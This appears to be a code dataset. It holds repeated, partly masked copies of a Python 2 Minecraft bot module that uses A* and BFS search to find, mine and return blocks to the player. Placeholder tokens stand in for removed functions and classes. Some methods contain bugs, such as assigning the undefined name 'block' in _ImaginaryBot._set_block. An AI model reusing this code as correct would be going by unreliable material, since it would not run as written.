state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n <function token>\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n <function token>\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n <function token>\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n 